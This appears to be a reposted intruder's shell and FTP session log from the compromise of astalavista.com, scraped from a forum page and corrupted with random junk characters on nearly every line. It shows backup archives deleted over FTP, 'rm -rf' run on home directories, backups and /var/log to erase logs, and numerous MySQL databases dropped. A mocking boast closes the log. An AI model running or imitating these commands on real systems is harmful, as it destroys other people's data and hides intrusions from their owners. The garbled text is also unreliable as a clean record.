i& X/ y2 o ~. _-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
6 E8 R, w$ C+ C-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
5 \, L: ]5 h7 K* l5 e* d-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
+ H8 A0 ^( s! @-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar% t" k& B7 d4 U' h- r
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
/ B2 J" M8 b& K8 {$ `[snip]! D% z3 F, p; x- f3 O
226 Transfer complete.
' T# f( D# Z/ M# K( ]( |ftp> mdelete *
3 {' [/ d4 S; c, G5 Kftp> ls -la
* Z# ]2 Z' @& P5 G e9 C' @- h227 Entering Passive Mode (212,254,194,163,2,193)' T! q8 q; E8 d7 f
150 Opening BINARY mode data connection for ‘file list’.' Y6 Z0 @5 K/ V& u/ i+ Z
226 Transfer complete.- w z$ k1 S( [& h; r" k2 z" Z
ftp>
8 y) }$ y* D2 \+ e/ }& u% n- j1 k6 f8 n
0 j+ l7 w& \- }" Bsh-3.2# cd /home
* V$ `- B2 z7 V. K5 F/ Ush-3.2# ls -la
8 m" n5 Z* \6 g: o3 E3 c2 ntotal 1203 ?2 o% A- Z3 y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .+ o0 f; {5 @4 t$ I k0 V
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..; Q7 x# l A1 k! r* G% Y
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin [# y8 ^: |2 K2 U4 r
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group8 I/ q/ n2 U3 C7 W* R9 k s; i
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user( V# ?: H% t- {0 ^+ h* P- E7 J7 P
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
% I* }" N: k' u" D0 Z" W5 Q& idrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
: m$ N9 M4 ~( f- Fdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141619 d% g8 g6 a1 L0 g4 ?' ~& A% W
drwx–x–x 10 com com 4096 Apr 28 12:40 com( K. B2 D7 e0 P8 i/ L2 M7 b
drwxr-xr-x 2 root root 4096 May 17 2007 ftp( o3 q, h' G6 ]% p' H
drwx—— 3 jon jon 4096 Sep 21 2007 jon
& z9 t O; Z2 W8 W. Q: }: S @drwx—— 2 root root 16384 Sep 11 2007 lost+found
* O( M' u9 a+ p9 Y u* r) M! tdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
. W5 k1 r' {( F9 u( Odrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
- _9 I/ ~- d0 ^% S0 V6 Cdrwx—— 2 jon jon 4096 Sep 15 2007 test' G+ c4 |9 b, U' o
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp9 Q3 [; D6 }$ r' i+ H
3 X5 c2 g: v! H7 U9 [sh-3.2# rm -rf backup/
5 Q( X+ Q) u' u" wsh-3.2# rm -rf backup.14161/
. Q4 X3 [5 _5 W% o- V0 O) Hsh-3.2# rm -rf ftp/" S c! C8 d( m5 f) I- Z0 H$ y3 q Z
sh-3.2# rm -rf jon/
7 n. J' Q* [* |0 wsh-3.2# rm -rf my/
# q5 h5 c( V. I0 i; C6 ~5 E# N7 zsh-3.2# rm -rf mysqldata/
0 t" M/ k+ l+ ~# {( H2 i( m1 Hsh-3.2# rm -rf test/
2 H# G D" h) J) e8 ish-3.2# rm -rf tmp/
1 e+ w! K1 t, ~% G* j' H" ~sh-3.2# cd ~8 Q- C4 X7 F- z, M i
sh-3.2# rm -rf *
5 U% e J8 D: X p3 gsh-3.2# rm -rf /var/log/
- a4 Y& r6 [, @rm: cannot remove directory `/var/log//proftpd’: Directory not empty, I+ G r/ \) \
sh-3.2# rm -rf /home/*
* B# L& R+ f/ a- hsh-3.2# mysql
9 o' ~( X$ |, t# I* Y) ]5 SWelcome to the MySQL monitor. Commands end with ; or \g.+ }$ [) M, E, w' Y: t o* {' g
Your MySQL connection id is 407156
' _6 D, S1 r) S' x) D4 dServer version: 5.0.45-community-log MySQL Community Edition (GPL)# R1 H# `2 x2 e/ R% o: [
+ K9 k. w; E, m" r9 O+ `
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
; p1 B( [9 N; r0 e
& X- G- u# S5 {# t5 Fmysql> show databases;0 \# X6 W6 `8 E" W- S
+———————–+
% U9 e" ?" M# z! N6 S( ]| Database |$ W, W" { C5 Q* J. @4 c# H* [( q: ?3 ^
+———————–+
5 ^: B2 m$ X( D& z/ O| information_schema |, _1 [ O6 ?: H1 q" t
| astanet_ads |
$ }* `4 u6 x+ T; Q| astanet_mailing_lists |9 U; Q3 W4 |9 y, f! b! m
| astanet_mediawiki |8 A" ]1 o9 o v. C) O
| astanet_membersystem |
% q/ ]0 k4 g+ }3 r/ n0 Q| com_contrexx |8 E# U- r7 ~; d' h+ i
| com_contrexx2 |& i; ~! r* r2 @% p# @+ b$ ?
| com_contrexx2_live |+ F% A8 B& _) B5 g1 K4 o1 z* z
| da_roundcube |
3 U, ~' |! o+ y6 H+ @4 ]: `1 F| dolphin |
8 N4 Z- f( c- g- S0 j+ K| ideapool |% q# ]% x( q3 f- A8 b! C
| mysql |7 i- U9 c @- u3 H9 c
| test |
0 f+ `/ G) C: R, t6 c; _7 t8 x| yourmaster |
( Q ^1 f4 k7 w# z0 _% e; N L' w; [+———————–+0 L" F, k( j! {7 i8 |
14 rows in set (0.03 sec)
, a" J: [6 ?" w% k5 D; ~" M2 X9 D! ]( W- D
mysql> drop database astanet_membersystem;
5 W' |+ R. k# m& C0 VdroQuery OK, 46 rows affected (0.81 sec)2 y* t* B; v1 E7 S9 p
/ d( K) g! u$ ?7 k( H' ^
mysql> drop database com_contrexx;; w& Y6 C) K8 J9 W5 u
Query OK, 211 rows affected (2.72 sec)* x6 ?# m) e9 k% j
3 C2 T' m# R! A& t& Y% Jmysql> drop database com_contrexx2;# G6 m% f/ Q% s* B0 H$ W
Query OK, 237 rows affected (2.23 sec). N7 p% ^& a5 _# x
) S3 x- o- a& X3 cmysql> drop database com_contrexx2_live;
k a$ ^+ e: ^7 S; TQuery OK, 227 rows affected (7.63 sec)
, c9 z+ K( @0 {* c& C0 p: Q
2 \3 e1 m/ h1 G- s# [0 _6 E; `mysql> drop database ideapool;8 a' T# Q1 a; o( Q
Query OK, 69 rows affected (0.19 sec)6 y3 T) u" t( M- v# \$ e
3 {( v$ m* c. }% [4 B1 Q
mysql> drop database yourmaster;
6 k8 J5 G3 [ Z+ x9 \1 kQuery OK, 158 rows affected (0.55 sec)
7 B/ E X# m$ A+ q; A+ [
9 U6 v$ L1 ?, ], ]. f8 rmysql> drop database astanet_ads;# M a: {# o0 V8 u" v6 e9 W
Query OK, 9 rows affected (0.11 sec)
" V, \5 b$ E6 ?: b; j
1 E9 R8 p$ U) u6 Jmysql> drop database astanet_mailing_lists;) H1 @( z. \, j9 A5 j k% {( H
Query OK, 24 rows affected (1.47 sec)2 y0 N! u& C8 n7 H. p% \6 G4 X4 D
* e, C+ ^2 l! X
mysql> drop database astanet_mediawiki;8 g3 }" }$ m) |+ U5 H) l& j
Query OK, 31 rows affected (0.51 sec)- W- a- {7 k. y' t! Z% d1 t$ j
1 T/ R9 F1 A+ a4 Qmysql> show databases;8 `1 w5 i# O2 j8 f+ V, G
+——————–+
! M9 s: Z% f" s6 n1 k6 h9 i" Z| Database |) z; e1 [1 v6 A- @% a7 c
+——————–+2 i+ x% b% {5 K( b
| information_schema |
+ U5 \! L4 \7 L6 Y5 f| da_roundcube |
' M; z0 i/ q6 e0 I" M# s| dolphin |
, S: ^' C" G' z, }' h/ `6 q| mysql |, P- K8 o& u# r$ D, D
| test |
* I3 Z2 ]( S1 `4 L" R1 c% \+——————–+) R* b9 p0 O" v% N
5 rows in set (0.00 sec)
0 h$ K! P+ E, U; u/ q/ p8 G! Y" w1 {
What a journey! We’re not sure exactly why the “Terminator” had any influence on- f ?+ u: X1 X0 t1 D8 w6 Y/ r- u
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
0 G7 k# A+ G+ ~% }! p |wrong to say this pack of morons *wont be back*.
( `9 q- _1 W# E |
发表于 2012-11-6 21:07:34
收藏
支持
反对